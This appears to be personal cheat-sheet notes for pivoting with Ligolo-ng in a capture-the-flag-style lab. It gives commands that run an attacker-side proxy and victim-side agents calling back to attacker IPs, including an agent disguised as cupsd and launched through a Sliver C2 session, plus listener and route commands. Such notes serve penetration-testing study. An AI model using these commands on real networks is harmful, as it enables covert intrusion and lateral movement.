Ligolo-ng

Quick Copy Paste

# proxy setup on attacker machine
./proxy -selfcert -laddr https://0.0.0.0:1080
WARN[0000] Using automatically generated self-signed certificates (Not recommended) 
INFO[0000] Listening on 0.0.0.0:1080
# agent from victim machine
- from sliver 
execute /usr/bin/cupsd "-connect 10.10.14.2:1080 -ignore-cert"
ligolo-ng » INFO[0672] Agent joined.                                 name=root@DANTE-WEB-NIX01 remote="10.10.110.100:58358"
# from attacker machine ligolo-ng cmd
session 
- choose session 
auto_route
- verify 
curl http://172.16.1.1

Windows Agent

  • start ligalo-ng windows agent in background via cmd.exe

cmd.exe /c start /b .\agent.exe -connect 172.16.1.100:7777 -ignore-cert
  • start ligalo-ng windows agent via sliver session

 execute -f '.\agent.exe -connect 172.16.1.20:6666 -ignore-cert'

Add Listener

  • add ligalo-ng listener listen on 172.16.2.5:8888 on connect forward to 10.10.14.3:8080 via tcp

   listener_add --addr 172.16.2.5:8888 --to 10.10.14.3:8080 --tcp

Add Additional route

  • Certain situations call for an additional route.

  • Imagine you have root access to a machine 10.100.0.3 and you are able to route to 172.16.0.0/24

  • Ligolo will not auto detect this as it will auto route you for the 10.110.0.0/24

tunnel_list
# get the name of your active interface 
route_add --name adeptsunshine --route 172.16.0.1/24

Last updated